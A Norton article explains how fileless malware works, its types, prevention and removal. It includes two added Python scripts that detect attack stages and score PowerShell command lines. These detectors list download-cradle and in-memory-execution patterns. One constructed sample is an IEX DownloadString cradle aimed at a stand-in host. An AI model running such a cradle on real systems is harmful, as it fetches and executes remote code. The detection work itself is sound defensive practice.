What is fileless malware and how does it work?
Traditional antivirus software protects your device by scanning for malicious files. But fileless malware can infect your device without installing traditional programs, instead running in memory or abusing trusted system tools to stay hidden from conventional antivirus scans. Learn how these stealthy attacks work, how they spread, and how advanced behavior-based protection can help detect and stop them.
Fileless malware attacks have become an increasingly acute risk in recent years. In September 2025, The Hacker News reported that a China-linked operation used a fileless malware framework to target military systems in the Philippines. Earlier that year, another large-scale campaign used fileless techniques to infect over 1,500 PostgreSQL servers.
Because fileless malware runs mainly in a device’s memory and often uses legitimate system tools and processes, it leaves behind fewer traditional files for antivirus software to detect. As a result, fileless malware can be significantly harder to identify than conventional malware infections.
Below, we break down exactly how fileless malware works and what you can do to protect yourself.
What is fileless malware?
Fileless malware is a type of malware that operates primarily in a device’s memory instead of relying on traditional executable files stored on a hard drive. Rather than installing malicious programs, it usually abuses legitimate system tools and built-in applications already present in the operating system.
This allows fileless malware to blend more easily into normal system activity and leave behind fewer traditional traces than conventional malware. While it may be able to evade less-sophisticated antivirus tools that rely heavily on file signatures to detect malware, more modern security solutions that use behavioral analysis and activity monitoring are generally better equipped to identify and stop these attacks.
How does fileless malware work?
Fileless malware exploits trusted tools and legitimate entry vectors to go undetected while giving attackers deeper access to your system. Here’s how this plays out in most cases:
- Initial access: Attackers usually gain entry through phishing emails, malicious links, compromised websites, or vulnerable applications. Although fileless malware aims to minimize the use of traditional files, the attack often begins with a small script, malicious document, or exploit that triggers the infection.
- In-memory execution: Once inside, the malware operates mainly in the device’s memory (RAM) rather than installing large executable files on the hard drive. It often abuses legitimate system tools such as PowerShell or Windows Management Instrumentation (WMI) to run malicious commands. However, it may leave small traces in logs and memory that advanced antivirus tools can detect.
- Persistence: To remain active after a reboot or logout, attackers may use techniques such as scheduled tasks, registry modifications, startup scripts, or misuse of legitimate administrative tools to maintain access across sessions and establish a persistent threat.
- Post-exploitation: Once embedded, fileless malware might steal credentials, log keystrokes, exfiltrate data, and remain undetected for extended periods. Attackers often continue operating through tools like PowerShell to move laterally across a network, compromising multiple devices from a single entry point.
The ShadowHS attack reported on by Cyber Press in early 2026 is a good example of just how sophisticated fileless malware can get. It killed competing malware (like Kinseng miners) to take full control of infected systems, then exfiltrated stolen data through encrypted tunnels that blended into legitimate network traffic, allowing it to bypass firewalls.
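The four stages above are easiest to recognise when endpoint telemetry is read as a chain rather than as isolated events. The script below is an added example (not code from the original article or from Norton) that correlates constructed process-creation, registry and WMI-subscription records, Sysmon-style in their field names, into those stages per host. The hosts, paths and command lines are invented for the demonstration, and the marker lists are an assumption chosen to illustrate the idea, not a complete detection ruleset.

```python
"""Correlate endpoint telemetry into the four stages of a fileless attack chain.

Added example, not code from the original article or from Norton. The event
records below are constructed for this demonstration; their field names mimic
Windows process-creation, registry and WMI-subscription telemetry, but no real
host or log was used.
"""
import os
import re
from collections import defaultdict

# Stage 1 - initial access: an Office or mail application spawning a script host.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe",
                "mshta.exe", "cmd.exe", "rundll32.exe", "regsvr32.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}

# Stage 2 - in-memory execution: switches that hide the window, skip the profile
# or pass the script as base64 so that no script file touches the disk.
IN_MEMORY_MARKERS = ("-encodedcommand", "-enc ", "-ec ", "invoke-expression",
                     "iex ", "downloadstring", "frombase64string",
                     "-windowstyle hidden", "-w hidden", "-noprofile", "-nop ")

# Stage 3 - persistence: autorun keys, WMI consumers and scheduled tasks whose
# action is a script interpreter rather than an installed program.
RUN_KEY = re.compile(r"\\currentversion\\run(once)?$", re.IGNORECASE)
INTERPRETERS = ("powershell", "pwsh", "mshta", "wscript", "cscript",
                "rundll32", "regsvr32")
WMI_CONSUMERS = {"CommandLineEventConsumer", "ActiveScriptEventConsumer"}

# Stage 4 - lateral movement: remoting cmdlets or WMI aimed at another host.
LATERAL_MARKERS = ("invoke-command", "enter-pssession", "new-pssession",
                   "invoke-wmimethod", "invoke-cimmethod", "/node:")

STAGES = ("initial_access", "in_memory_execution", "persistence", "lateral_movement")


def _base(path):
    """Lower-case file name of a Windows path (works on any OS)."""
    return os.path.basename(path.replace("\\", "/")).lower()


def classify(event):
    """Return a list of (stage, reason) pairs for one telemetry record."""
    hits = []
    kind = event["type"]
    if kind == "process_create":
        parent, image = _base(event["parent_image"]), _base(event["image"])
        cmd = event["command_line"].lower()
        if parent in OFFICE_PARENTS and image in SCRIPT_HOSTS:
            hits.append(("initial_access", f"{parent} spawned {image}"))
        if image in POWERSHELL and any(m in cmd for m in IN_MEMORY_MARKERS):
            hits.append(("in_memory_execution", f"{image} with in-memory switches"))
        if (image in POWERSHELL and any(m in cmd for m in LATERAL_MARKERS)) or \
                (image == "wmic.exe" and "/node:" in cmd):
            hits.append(("lateral_movement", f"{image} targeting a remote host"))
    elif kind == "registry_set":
        if RUN_KEY.search(event["key"]) and \
                any(i in event["data"].lower() for i in INTERPRETERS):
            hits.append(("persistence", f"autorun value {event['value_name']!r} launches an interpreter"))
    elif kind == "wmi_consumer":
        if event["consumer_type"] in WMI_CONSUMERS:
            hits.append(("persistence", f"WMI {event['consumer_type']} {event['name']!r}"))
    elif kind == "task_create":
        if any(i in event["action"].lower() for i in INTERPRETERS):
            hits.append(("persistence", f"scheduled task {event['task_name']!r} runs an interpreter"))
    return hits


def correlate(events):
    """Map host -> stage -> list of reasons, so the stages read as a chain."""
    findings = defaultdict(lambda: defaultdict(list))
    for ev in events:
        for stage, reason in classify(ev):
            findings[ev["host"]][stage].append(reason)
    return {host: dict(stages) for host, stages in findings.items()}


def chain_hosts(events, min_stages=2):
    """Hosts on which at least `min_stages` distinct chain stages were seen."""
    return sorted(h for h, s in correlate(events).items() if len(s) >= min_stages)


# Constructed sample telemetry: ws01 shows the whole chain, srv02 only a
# persistence artifact, ws03 only routine administration that must not fire.
SAMPLE_EVENTS = [
    {"host": "ws01", "type": "process_create",
     "parent_image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell.exe -NoP -W Hidden -Enc SQBFAFgA"},
    {"host": "ws01", "type": "registry_set",
     "key": r"HKU\S-1-5-21-1111\Software\Microsoft\Windows\CurrentVersion\Run",
     "value_name": "Updater", "data": "mshta <constructed script placeholder>"},
    {"host": "ws01", "type": "process_create",
     "parent_image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell Invoke-Command -ComputerName FS01 -ScriptBlock {}"},
    {"host": "srv02", "type": "wmi_consumer", "name": "SystemHealth",
     "consumer_type": "CommandLineEventConsumer"},
    {"host": "ws03", "type": "process_create",
     "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell.exe Get-Service -Name Spooler"},
    {"host": "ws03", "type": "task_create", "task_name": "OneDrive Update",
     "action": r"C:\Users\a\AppData\Local\Microsoft\OneDrive\OneDriveStandaloneUpdater.exe"},
]

if __name__ == "__main__":
    for host, stages in correlate(SAMPLE_EVENTS).items():
        print(host, [s for s in STAGES if s in stages])
    print("chain hosts:", chain_hosts(SAMPLE_EVENTS))
```

Run on the sample, ws01 lights up all four stages while srv02 shows only a persistence artifact and ws03 nothing at all; the point of grouping by host is that a single WMI consumer or one PowerShell launch is ambiguous, but two or more stages on the same machine are the behavioral pattern the article describes and deserve an analyst's attention.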
Types of fileless malware attacks
Cybercriminals use different fileless malware techniques and types depending on what they're targeting and how they want to stay hidden. Some, like rootkits, remain in your device's memory, while others exploit tools your system already trusts.
Here are some types of fileless malware you might come across:
- Memory-resident malware: This malicious code lives entirely in your device's RAM. It leaves no trace on your hard drive and typically disappears when the system reboots, which makes it hard to detect and even harder to investigate forensically without specialized tools.
- Registry-resident malware: Instead of writing files to disk, this type of malware embeds malicious code directly into the Windows registry. Kovter and Poweliks, which were common in the 2010s, are well-known examples.
- Fileless ransomware: This type of ransomware encrypts your files without using a traditional installer on your device. And like all fileless malware, it typically runs entirely through legitimate system tools.
- Exploit kits: These are automated toolkits that scan for vulnerabilities in browsers, plugins like Java or Flash, and other applications. Once they find a weakness, they often inject malicious code directly into memory.
- Rootkits: This type of malware targets your operating system directly, allowing attackers to gain privileged access while actively hiding their presence from security tools.
- Hybrid malware: A combination of fileless and traditional techniques, in which attackers use fileless methods to evade detection while relying on conventional malware components to achieve specific goals.
- Script-based attacks: Attackers can use trusted scripting tools like PowerShell or JavaScript to run malicious code directly in memory. Because these are programs your system uses every day, their activity is less likely to trigger security alerts on its own.
Why fileless malware is dangerous
Fileless malware is especially dangerous because it’s designed to evade traditional detection methods. Instead of relying heavily on malicious files stored on a hard drive, it often operates in memory and abuses legitimate system tools that devices already trust and use every day.
By masking their activity as normal system behavior, attackers may be able to maintain access for extended periods before the malware is detected. In some cases, they can also move laterally across a network, compromising additional devices or accounts along the way.
The impact of a fileless malware attack can be severe, ranging from credential theft and financial fraud to large-scale identity theft or full system compromise.
How to prevent fileless malware attacks
Because fileless malware often exploits both software vulnerabilities and human behavior, practicing good cybersecurity habits can significantly reduce your risk. Here are some of the best ways to help prevent fileless malware attacks:
- Be careful when downloading apps: Only download software from trusted app stores and do your research on the app before installing it. Fileless malware often piggybacks on legitimate-looking files like a fake torrent or a compromised installer.
- Keep your software updated: Fileless malware frequently exploits known vulnerabilities in outdated software. Regular updates and security patches help close these gaps before they can be abused.
- Secure your browser: Your browser is a common attack vector for all types of malware, including fileless attacks delivered through malicious scripts or exploit kits. Keep your browser updated, remove extensions you no longer use, and avoid installing add-ons from untrusted sources.
- Watch for phishing attempts: A convincing fake email or a link that looks legitimate can be the entry point for a fileless attack. This includes “unsubscribe links” in scam emails, as they can be phishing links too.
- Limit unnecessary admin access: Since fileless attacks typically abuse legitimate administrative tools like PowerShell or WMI, restricting administrator privileges and disabling unused scripting features can help reduce the attack surface.
- Get antivirus software: Try modern security tools like Norton 360, which use behavior-based detection to monitor suspicious activity across your system, including in memory. This is one of the most effective ways to catch fileless malware threats that leave minimal digital footprints.
How to detect and remove fileless malware
Detecting fileless malware means looking for abnormal behavior on your device. Watch for unusual code execution, unexpected PowerShell or WMI use, or spikes in network traffic. These are known as indicators of attack (IOAs), and they're important signals that something malicious may be happening in the background.
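"Unexpected PowerShell use" is only actionable once you can see what a command line actually does, and fileless tooling routinely hides that behind -EncodedCommand. The script below is an added example (not code from the original article or from Norton) that decodes such command lines and scores them against a small set of IOAs: download cradles, dynamic evaluation, in-memory assembly loading, hidden windows and obfuscation. The records, hosts and scripts are constructed, and the indicator weights and alert threshold are assumptions for the demonstration; the encoded sample is built from a known plaintext inside the script so the decoder can be checked.

```python
"""Triage PowerShell command lines for indicators of attack (IOAs).

Added example, not code from the original article or from Norton. The records
are constructed: in real use they would come from process-creation or
PowerShell script block logs. The encoded sample is built from a known
plaintext so the decoder's output can be verified.
"""
import base64
import binascii
import re

# powershell.exe accepts -e / -ec / -enc / -EncodedCommand followed by the
# base64 of the script text encoded as UTF-16LE.
ENC_FLAG = re.compile(r"-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)

# Each indicator: weight and a case-insensitive pattern applied to the command
# line plus its decoded script. Weights are an assumption for this example.
INDICATORS = {
    "download_cradle": (3, re.compile(
        r"net\.webclient|downloadstring|downloadfile|invoke-webrequest|\biwr\b", re.I)),
    "dynamic_eval": (3, re.compile(r"invoke-expression|\biex\b|\[scriptblock\]::create", re.I)),
    "in_memory_load": (3, re.compile(r"reflection\.assembly|::load\(|frombase64string", re.I)),
    "hidden_window": (2, re.compile(
        r"-w(?:indowstyle)?\s+hidden|-noni(?:nteractive)?\b|-e(?:xecutionpolicy|p)\s+bypass", re.I)),
    "char_code_obfuscation": (2, re.compile(r"\[char\]\s*\d+|-join\s*[\(\$]", re.I)),
    "embedded_blob": (1, re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")),
}
ALERT_THRESHOLD = 4  # assumption: tune against your own baseline


def decode_encoded_command(command_line):
    """Recover the script behind -EncodedCommand, or None if absent or invalid."""
    m = ENC_FLAG.search(command_line)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError):
        return None


def score_script(text):
    """Sum indicator weights over text; return {'score', 'indicators'}."""
    hits = sorted(name for name, (_, pat) in INDICATORS.items() if pat.search(text))
    return {"score": sum(INDICATORS[n][0] for n in hits), "indicators": hits}


def triage(records, threshold=ALERT_THRESHOLD):
    """Decode and score each record; return the alerts at or above threshold."""
    alerts = []
    for rec in records:
        decoded = decode_encoded_command(rec["command_line"])
        text = rec["command_line"] + ("\n" + decoded if decoded else "")
        result = score_script(text)
        if result["score"] >= threshold:
            alerts.append({"host": rec["host"], "decoded": decoded, **result})
    return alerts


def _encode(script):
    """Build an -EncodedCommand argument the way powershell.exe expects it."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed samples (hosts, scripts and the .invalid URL are made up).
SAMPLE_SCRIPT = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/s')"
SAMPLE_RECORDS = [
    {"host": "ws01", "command_line":
     f"powershell.exe -NoP -W Hidden -EncodedCommand {_encode(SAMPLE_SCRIPT)}"},
    {"host": "ws02", "command_line": "powershell.exe -Command Get-Service -Name Spooler"},
    # Encoding alone is not malicious: admins use it for quoting-heavy one-liners.
    {"host": "ws03", "command_line": "powershell.exe -EncodedCommand "
     + _encode(r"Get-ChildItem C:\Logs | Where-Object Length -gt 1MB")},
    {"host": "ws04", "command_line":
     'powershell -w hidden -c "[Reflection.Assembly]::Load([Convert]::FromBase64String($b))"'},
]

if __name__ == "__main__":
    for a in triage(SAMPLE_RECORDS):
        print(a["host"], a["score"], a["indicators"])
        if a["decoded"]:
            print("  decoded:", a["decoded"])
```

Two design points matter here. First, the encoded sample from ws03 scores only 1 and never alerts: an encoded command is an indicator, not a verdict, and treating it as one floods analysts with admin noise. Second, the decoded script is included in the alert so that the reviewer sees the plaintext rather than the base64 blob, which is the step that turns "unexpected PowerShell use" into a decision.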
If you suspect a fileless malware infection, here are some steps you can take to help contain and remove it:
- Disconnect from the internet: Immediately disable Wi-Fi or unplug your network connection to help prevent the malware from communicating with external servers, spreading across a network, or exfiltrating data.
- Restart your device: Some fileless malware exists mainly in memory and may be disrupted or partially removed after a reboot. While restarting alone usually won’t fully eliminate the threat, it can interrupt active malicious processes.
- Run a full security scan: Use a modern security solution like Norton 360 that includes behavioral or memory-based detection capabilities. Running a full system scan may help identify suspicious activity, persistence mechanisms, or related malware components.
- Remove suspicious software and extensions: Uninstall unfamiliar apps, browser extensions, or recently added programs that could be connected to the infection. Resetting your browser settings may also help remove malicious scripts or unauthorized changes.
- Restore your system: If the infection persists, restoring your device to an earlier backup or recovery point may help remove malicious changes. In severe cases, a full operating system reinstall may be the safest option.
- Change important passwords: After securing the device, update passwords for sensitive accounts — especially email, banking, and work-related logins — in case credentials were compromised during the attack.
Protect against fileless malware with Norton
Fileless malware is designed to evade traditional defenses by hiding inside trusted system tools and running directly in memory. That’s why Norton 360 goes beyond standard file scanning with advanced behavioral and heuristic detection designed to spot suspicious activity in real time, even from ultra-stealthy threats.
With powerful, always-on protection working in the background, Norton 360 helps keep your devices safer from evolving attacks. And if Norton experts can’t remove a malware infection from your device, you’ll get your money back.
FAQs
Can Norton 360 detect fileless malware?
Yes, modern security tools like Norton 360 use behavioral analysis and pattern detection to identify suspicious activity associated with fileless malware. Because these threats often operate without traditional files, detection relies on monitoring system behavior rather than scanning files alone.
Is fileless malware a virus?
No. Fileless malware and traditional computer viruses are both forms of malware, but they operate differently. Fileless malware typically runs in memory and operates via legitimate system tools, while traditional viruses rely on infected files to spread.
What should I do if I think I clicked a malware link?
Disconnect from the internet immediately to help stop any communication with malicious servers. Then run a full system scan using trusted security software. If you entered passwords or sensitive information, change those credentials from a separate, uncompromised device as soon as possible.
Editors' note: Our articles offer educational information and are written to raise awareness about important topics in Cyber Safety. Norton products and services may not protect against every type of threat, fraud, or crime we write about. For more details about how we research, write, and review our articles, see our Editorial Policy.